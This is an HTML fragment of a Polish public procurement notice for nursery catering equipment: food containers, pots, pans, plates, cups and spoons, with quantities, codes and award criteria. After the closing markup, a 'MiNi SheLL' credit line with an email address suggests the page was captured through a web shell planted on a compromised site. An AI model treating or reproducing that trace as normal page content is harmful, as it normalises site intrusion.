<br/>data zakończenia: 2020-08-21<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawę wyposażenia pionu żywienia z podziałem na trzy zadania. ZADANIE 1 Dostawa drobnego sprzętu do wyposażenia kuchni ZADANIE 2 Dostawa garnków, pojemników GN ZADANIE 3 Dostawa kubków, misek, talerzy, łyżeczek Znak postępowania: ZP-67/WZŻ/2020</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>"Pojemnik gastronomiczny GN 1/1 z pokrywą ze stali nierdzewnej z uchwytami . Pojemnik polecany do wszystkich zastosowań w temperaturach od -20 do 300º C. Posiada ruchome chowane uchwyty.Wymiary (dł; szer; wys):32.5x53x10 cm (+/-10%)Pojemność:14 l(+/-10%)Głębokość:10 cm.(+/-10%)W komplecie z pokrewa ze stali nierdzewnej.Dopuszczony do kontaktu z żywnością."	SZT	7"Pojemnik gastronomiczny GN 2/3 z pokrywą ze stali nierdzewnej z uchwytami . Pojemnik polecany do wszystkich zastosowań w temperaturach od -20 do 300º C. Posiada ruchome chowane uchwyty.Wymiary (dł; szer; wys):32.5x35.4x10 cm(+/-10%)Pojemność:8 l(+/-10%)Głębokość:10 cm(+/-10%)W komplecie z pokrewa ze stali nierdzewnej.Dopuszczony do kontaktu z żywnością."	SZT	14"Pojemnik gastronomiczny GN 1/3 z pokrywą ze stali nierdzewnej z uchwytami . Pojemnik polecany do wszystkich zastosowań w temperaturach od -20 do 300º C. Posiada ruchome chowane uchwyty.Wymiary (dł; szer; wys):32.5x17.6x10 cm(+/-10%)Pojemność:3.7 l(+/-10%)Głębokość:10 cm.(+/-10%)W komplecie z pokrywa ze stali nierdzewnej."	SZT	7"Pojemnik gastronomiczny GN 1/4 z pokrywą ze stali nierdzewnej z uchwytami . Pojemnik polecany do wszystkich zastosowań w temperaturach od -20 do 300º C. Posiada ruchome chowane uchwyty.Wymiary (dł; szer; wys):26.5x16.2x20 cm(+/-10%)Pojemność:5 l(+/-10%)Głębokość:20 cm.(+/-10%)W komplecie z pokrywą ze stali nierdzewnej.Dopuszczony do kontaktu z żywnością."	SZT	7Pojemnik gastronomiczny GN 1/2 200 mm z pokrywą wykonany z półprzezroczystego polipropylenu z - zestawem kolorowych klipsów do oznaczania pokrywy i pojemnika (2x4 klipsy - zielony, niebieski, żółty, czerwony) Dostosowany do stosowania w temperaturze od -40°C do +95°C. Nie absorbuje zapachów i smaków. Wym. min. 325 x 265 mm.Dopuszczony do kontaktu z żywnością.	SZT	14"Pojemnik gastronomiczny GN 1/9 z pokrywą o głębokości 10 cm (+/-10%)wykonany ze stali nierdzewnej. Grubość stali 0,6 mm (+/-10%)Zaokrąglone narożniki.Wymiary (dł; szer; wys):17.6x10.8x10 cm(+/-10%)W komplecie z pokrywą ze stali nierdzewnej.Dopuszczony do kontaktu z żywnością."	SZT	7"Pojemnik gastronomiczny GN 1/6 z pokrywą ze stali nierdzewnej z uchwytami . Pojemnik polecany do wszystkich zastosowań w temperaturach od -20 do 300º C. Posiada ruchome chowane uchwyty.Wymiary (dł; szer; wys):17.6x16.2x20 cm(+/-10%)Pojemność:2.8 l(+/-10%)Głębokość:20 cm.(+/-10%)W komplecie z pokrywą ze stali nierdzewnej.Dopuszczony do kontaktu z żywnością."	SZT	14"POJEMNIK GN 1/2 Z POLIPROPYLENU Z POKRYWĄ Hermetyczny pojemnik gastronomiczny do przechowywania żywności zgodny z wymogami norm HACCP. Wykonany z nieprzezroczystego polipropylenu, który nie pochłania zapachów i smaków. Pojemnik wykonany w standardzie GN 1/2.Pojemników można używać w zakresie temperatury od -40°C do +95°C. (+/-10)Pojemnik wyposażony w szczelną pokrywkę . Zestaw do oznaczania pojemników zawiera 8 klipsów - 2 z każdego koloru (zielony, niebieski, żółty, czerwony). Dodatkowo pojemnik posiada etykietkę do wypełniania zmywalnym markerem. Pojemniki można ustawiać jeden na drugim. Przystosowane do mycia w zmywarkach gastronomicznych.Wymiary (dł; szer; wys):32.5x26.5x20 cm(+/-10%)Pojemność:12.5 l(+/-10%)Głębokość:20 cm.(+/-10%) Dopuszczony do kontaktu z żywnością."	SZT	4"POJEMNIK GN 1/6 Z POLIPROPYLENU Z POKRYWĄ Hermetyczny pojemnik gastronomiczny do przechowywania żywności zgodny z wymogami norm HACCP. Wykonany z nieprzezroczystego polipropylenu, który nie pochłania zapachów i smaków. Pojemnik wykonany w standardzie GN 1/6.Pojemników można używać w zakresie temperatury od -40°C do +95°C. (+/-10)Pojemnik wyposażony w szczelną pokrywkę. Zestaw do oznaczania pojemników zawiera 8 klipsów - 2 z każdego koloru (zielony, niebieski, żółty, czerwony). Dodatkowo pojemnik posiada etykietkę do wypełniania zmywalnym markerem. Pojemniki można ustawiać jeden na drugim. Przystosowane do mycia w zmywarkach gastronomicznych.Wymiary (dł; szer; wys):17.6x16.2x10 cm(+/-10%)Pojemność:1.7 l(+/-10%)Głębokość:10 cm(+/-10%)"	SZT	4"Pojemnik gastronomiczny GN na kanapki z poliwęglanu wzmocnionego, wykonane z białego poliwęglanu nie absorbującego zapachów i smaków Duża odporność na uderzenia Zakres temperatur od -40°C do +110°C.DŁUGOŚĆ: 530 mm.Pokrywy gastronomiczne gn z poliwęglanu, wykonane z białego poliwęglanu nie absorbującego zapachów i smakówDuża odporność na uderzeniaZakres temperatur od -40°C do +110°CSZEROKOŚĆ: 325 mm(+/-10%)WYSOKOŚĆ: 200 mm(+/-10%)ROZMIAR W STANDARDZIE GN: GN 1/1 (530x325 mm)."	SZT	7"Rondel z pokrywa wykonany ze stali nierdzewnej Kapsułowe dno wielowarstwoweNienagrzewające się wielopunktowo mocowane uchwyty Można myć w zmywarceMożna używać do indukcji. Poj.min.min.7L .wysokość: min. 130 mmśrednica: min.280 mm Pokrywka ze stali nierdzewnej o średnicy min. 280 mm"	SZT	2GARNEK Z KRANEM I POKRYWKĄ średnica: 50 cm (+/-5cm), wysokość: 50 cm(+/-5cm) ,pojemność:min. 100 litrów,waga garnka: 10-12 kg,wyprodukowany z wysokiej jakości stali nierdzewnej ,zawór spustowy min. 3/4 cala,nitowane, wygodne uchwyty które się nie nagrzewają,dno wielowarstwowe typu sandwich (lub równoważne) pozwalające na szybkie nagrzewnie na kuchniach elektrycznych, ceramicznych,gazowych, indukcyjnych,nadaje się do mycia w zmywarce	SZT	1Wykonana jest w całości ze stali nierdzewnej. Grubość ścianek patelni wynosi 1-1,5 mm, a grubość dna 5-7 mm.Średnica min.34 cm.Dno patelni min. trzywarstwowe w typie sandwich lub równoważne.Posiada nienagrzewający się, wentylowany i beznitowo mocowany uchwyt. Patelnia nadaje się do każdego rodzaju kuchenek, w tym kuchenek indukcyjnych oraz można ją myć w zmywarkach.Wysokośc min. 65 mm	SZT	2"Profesjonalna patelnia aluminiowa z powłoką teflonową przeznaczona do smażenia naleśników. Niskie (2 cm) ścianki patelni umożliwiają swobodne przewracanie naleśnika i zsuwanie go na talerz. Patelnia jest kryta min. potrójną warstwą teflonu. Płaski epoksydowany stalowy uchwyt nitowany do patelni.Wysokość:min. 2 cmśrednica:min.25 cm "	SZT	6<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39220000-0, 39221000-7, 39221120-4, 39221210-2, 39223100-2, 39221180-2, 39221130-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-08-21<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawę wyposażenia pionu żywienia z podziałem na trzy zadania. ZADANIE 1 Dostawa drobnego sprzętu do wyposażenia kuchni ZADANIE 2 Dostawa garnków, pojemników GN ZADANIE 3 Dostawa kubków, misek, talerzy, łyżeczek Znak postępowania: ZP-67/WZŻ/2020</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Talerz głęboki . Średnica 210- 220 mm, wysokość 30- 35 mm.Pojemność 240-260ml. Kolor biały mleczny. Wykonany ze szkła fluorokrzemianowego, wytrzymały na wstrząsy i uderzenia. O strukturze nieporowatej (nie zatrzymuje żadnych mikroorganizmów). Nadający się do mycia w zmywarkach gastronomicznych w temp. wyparzania mycia powyżej +90st. Posiadający atesty PZH. Do wszelkiego rodzaju zastosowań ze szczególnym wskazaniem na żywienie zbiorowe w żłobkach. Bez przetłoczeń.	SZT.	252Talerz płytki śniadaniowy. Średnica 180-195 mm, wysokość 20-25 mm. Kolor biały mleczny. Wykonany ze szkła fluorokrzemianowego, wytrzymały na wstrząsy i uderzenia. O strukturze nieporowatej (nie zatrzymuje żadnych mikroorganizmów). Nadający się do mycia w zmywarkach gastronomicznych w temp. wyparzania mycia powyżej +90st. Posiadający atesty PZH. Do wszelkiego rodzaju zastosowań ze szczególnym wskazaniem na żywienie zbiorowe w żłobkach. Bez przetłoczeń.	SZT.	230Talerz obiadowy wykonany z hartowanego szkła, gładkiego szkła, w kolorze białym.Srednica talerza 22-25 cm.Nadaje się do mycia w zmywarkach gastronomicznych. Przeznaczony do kontaktu z żywnością.Posiadający atesty PZH. Dopuszczony do kontaktu z żywnością.	SZT.	230Miska wykonna z białej porcelany posiadający wzmocnione brzegi , przystosowany do mycia w zmywarkach , średnica 12-15 cm, wysokość 5-7cm , pojemność 0,30-0,50 l .Posiadający atesty PZH. Dopuszczony do kontaktu z żywnością.Z mozliwością sztamplowania.	SZT.	230Kubek -filiżankaz uchem. Kolor biały mleczny. Wysokość 55-65 mm. Średnica 75- 85mm. Pojemność 190- 200 ml. Wykonany ze szkła fluorokrzemianowego lub porcelany, wytrzymały na wstrząsy i uderzenia. O strukturze nieporowatej (nie zatrzymuje żadnych mikroorganizmów). Nadający się do mycia w zmywarkach gastronomicznych w temp. wyparzania mycia powyżej +90st;Posiadający atesty PZH. Do wszelkiego rodzaju zastosowań ze szczególnym wskazaniem na żywienie zbiorowe w żłobkach. Bez przetłoczeń. Kubek/filizanka z możliwością sztampowania (piętrowania)Dopuszczony do kontaktu z żywnością.	SZT.	230Łyżeczki małe do karmienia dzieci dł. 180 mm wykonana ze stali nierdzewnej polerowanej o zaokraglonych brzegach ze stali 18/10.Dopuszczona do kontaktu z żywnością.	SZT.	250Łyżka do zupy polerowana maszynowo. Długość205mm (+/-5mm)wykonana ze stali nierdzewnej o zaokrąglonych brzegach.Dopuszczona do kontaktu z żywnością.	SZT.	250Dzbanki wykonane z poliwęglanu z pokrywką o pojemności 1,5-2litrów. Dopuszczone do kontaktu z żywnością. Z mozliwością mycia w zmywarce.Dopuszczony do kontaktu z żywnoscią.	SZT.	14Komplet naczyń: filiżanki do herbaty + spodek szt 12,talerz głęboki szt 12, talerz płytki śr szt 12, talerz deserowy szt 12, półmisek - 2 szt., miska 1 szt., sosjerkaz podstawą 1 szt., waza z pokrywą 1 szt., cukiernica - 1 szt., , mlecznik - 1 szt.; Naczynia typu Baron Silver w kolorze białym wykonane z porcelany z delikatnym, klasycznym zdobieniem srebno-kremowym lub równoważnym po akceptacji przez zamawiającego. Dopuszczenie do kontaktu z żywnoscią.	KPL.	1<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39220000-0, 39221000-7, 39221120-4, 39221210-2, 39223100-2, 39221180-2, 39221130-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-08-21<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com